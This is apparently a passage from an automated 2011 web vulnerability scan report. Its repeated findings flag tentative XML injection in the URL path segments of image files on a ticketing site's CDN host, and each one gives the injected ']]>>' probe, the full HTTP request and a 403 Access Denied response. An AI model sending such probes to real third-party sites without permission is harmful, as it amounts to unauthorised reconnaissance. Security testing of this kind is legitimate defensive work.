User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 97D2C8F3CF74D0A3
x-amz-id-2: VWGeHInW4LBASBCfkrxC4o35FB9AKP6t5B82IrfOPrA6hH+V205sDUzBLiKlRnFA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 60c3f5cc4545c737df9dfab557abd280db7dcbf02fde39b37c995bedc6b79b4964f22aa24110d74b
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>97D2C8F3CF74D0A3</RequestId><HostId>VWGeHInW4LBASBCfkrxC4o35FB9AKP6t5B82IrfOPrA6hH+V20
...[SNIP]...

8.54. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E64A2EF17ED7F8F7
x-amz-id-2: uLaa7J1JVXJ4VCKjHmLFRsd3yRkVvUQiUR/j/vmd8gqykDDhaGkH9L/NqcK8E1tJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 426a7c8ad8f6fafc431df70eb9927f845c5f3b9207e8517a7b21ea3a8534855f1d3aa67abb128e9e
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E64A2EF17ED7F8F7</RequestId><HostId>uLaa7J1JVXJ4VCKjHmLFRsd3yRkVvUQiUR/j/vmd8gqykDDhaG
...[SNIP]...

8.55. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2F608FA35C9E3501
x-amz-id-2: Dbr0Dxl0mdtsdtLsB7V+EJJkzoVnruAFSKDPQJEZKQqpsaUEQt/GIjHVXPD/mbys
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e6cafe12d267df7b33fed43d9d04bdff6d55b04a00070ca74f620b1ee2749155c3199dbbb6fe806d
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2F608FA35C9E3501</RequestId><HostId>Dbr0Dxl0mdtsdtLsB7V+EJJkzoVnruAFSKDPQJEZKQqpsaUEQt
...[SNIP]...

8.56. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 68D659726C9F9AA2
x-amz-id-2: N+PBn1iCyWbTq1F3bRHgZEc77k12U4pcO9zm1qa1q2d5SjxHqNAi4tPbUjP4iQbJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 66d7c7c992b705418d8d031c0d69e3139324fce1824f98c93ca338a81a6c8c2e56f783785a5c4d1e
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>68D659726C9F9AA2</RequestId><HostId>N+PBn1iCyWbTq1F3bRHgZEc77k12U4pcO9zm1qa1q2d5SjxHqN
...[SNIP]...

8.57. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 29CE6CA3361C9A42
x-amz-id-2: S7ZfhvdOl+jpEdGVXr9u4p+7sxO/m6/lFMFCjan2kMtJNPJOkEuh6x1bvYFOIBz5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b1dc8b579c61f3ef634a769fc10c210d69b21f11ad08e1f3ae30f606049d93dfa5d2dd8f50270a2c
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>29CE6CA3361C9A42</RequestId><HostId>S7ZfhvdOl+jpEdGVXr9u4p+7sxO/m6/lFMFCjan2kMtJNPJOkE
...[SNIP]...

8.58. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EE4786D2F0C4DD41
x-amz-id-2: fWaPkQ+hakyyzDbF3USV79rrF672ZyTjZ04gQuNsO6iNoLuBtpGzH18Mz0bzhxak
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0835c814b3fd9c932d918eb0a1ba6f085ce05356aa50fbb2bacceccdcf7381dc01010303caae3d01
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE4786D2F0C4DD41</RequestId><HostId>fWaPkQ+hakyyzDbF3USV79rrF672ZyTjZ04gQuNsO6iNoLuBtp
...[SNIP]...

8.59. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1FB3F482E6730F8D
x-amz-id-2: oL7r+oxwkWPHTeXRL9mWTefzjmVfz2ySxJdqpVXzeuzHtbdU5GX3qNtLfx5WfcNa
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3a00e9dc64c346facd0277006decc8814bcf705e9e66391bb1271299ab13c0a46a76c6bc40f0aa28
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1FB3F482E6730F8D</RequestId><HostId>oL7r+oxwkWPHTeXRL9mWTefzjmVfz2ySxJdqpVXzeuzHtbdU5G
...[SNIP]...

8.60. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C9955B308F8FEFFE
x-amz-id-2: kwLZ1rz9YYbpnWjTTmLZY7WNyG+Vf+VTSZgMVSURLy813qhkSA2aJB3Jd697ZdXC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6d6eddabf17889e85299959e8b897592ee84960d9a81f7aed6d5a272b8ab5ed934392d2408d2737d
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C9955B308F8FEFFE</RequestId><HostId>kwLZ1rz9YYbpnWjTTmLZY7WNyG+Vf+VTSZgMVSURLy813qhkSA
...[SNIP]...

8.61. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8C45CD6008731035
x-amz-id-2: kCrb7KiNecQtqv7ZTIpufFUd8ANe7rUjIdkm81J8VLoJfLpoVegk/QHR3pcst3SN
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 57df09e29366269f360f1ad6f23b3935f51af117099809cc7d200aaecbb8182bde14a557042ff01b
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8C45CD6008731035</RequestId><HostId>kCrb7KiNecQtqv7ZTIpufFUd8ANe7rUjIdkm81J8VLoJfLpoVe
...[SNIP]...

8.62. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1894ACE74A3AB241
x-amz-id-2: rVaqUWzjfyUkbvNeUbMu925QyydHPq0lxP9pgelyKWA5g9MUre2Nav5TPFkzGfMn
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 69931ef36690f51112bf426d8608f98b766e14f6a9c76959319749f0c4065817914f28261c056e9c
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1894ACE74A3AB241</RequestId><HostId>rVaqUWzjfyUkbvNeUbMu925QyydHPq0lxP9pgelyKWA5g9MUre
...[SNIP]...

8.63. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6A147218662C06A9
x-amz-id-2: K9pLp0vq2f82T+iYSFXV6Cuu6Hz/1efT7ERnne/qIBbNS7BlZA9xBUVqwPA9IutP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 586f006cc67fd9fa5afe77486f7868cf2bff0c8300beac35321828fc04fe232ec55a13543f8eb349
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6A147218662C06A9</RequestId><HostId>K9pLp0vq2f82T+iYSFXV6Cuu6Hz/1efT7ERnne/qIBbNS7BlZA
...[SNIP]...

8.64. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 164E4104D16CF0FA
x-amz-id-2: pWpy1OveVsYhNN/xyKV63zweyNPCWVZLChPOyb4Z9YZKW82wroMsgRm2rAZMTy6J
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d6254a0dc9ae262649a1c0325c60dacc78a7ea9135c3b5e4ad891a608505abed200e42141ab0cb55
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>164E4104D16CF0FA</RequestId><HostId>pWpy1OveVsYhNN/xyKV63zweyNPCWVZLChPOyb4Z9YZKW82wro
...[SNIP]...

8.65. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AAF1730954521EE0
x-amz-id-2: 4QQ+96oTmpoWYSqiJL4Fbm1ZyQZdYtav/gZC+ofShTcRwDhgEDy4KrRN2UXwyVUj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7f984e68affe60ea88b984bb5251119734e18f272a0b53d83ad7ffc5cea473b1500cb1edeaa228ba
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AAF1730954521EE0</RequestId><HostId>4QQ+96oTmpoWYSqiJL4Fbm1ZyQZdYtav/gZC+ofShTcRwDhgED
...[SNIP]...

8.66. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 102A6EC9CAC96E3B
x-amz-id-2: HmucvidHyY5ushXsS4NiRudCuTKdffLZrK7yr6qS4d+iHGXXiJ+HTS5reBHB9ijP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d03541a0b8b26853ac2245702397cc42fe58f78f77042091ce8d2e1e585b997a7ac952627c833753
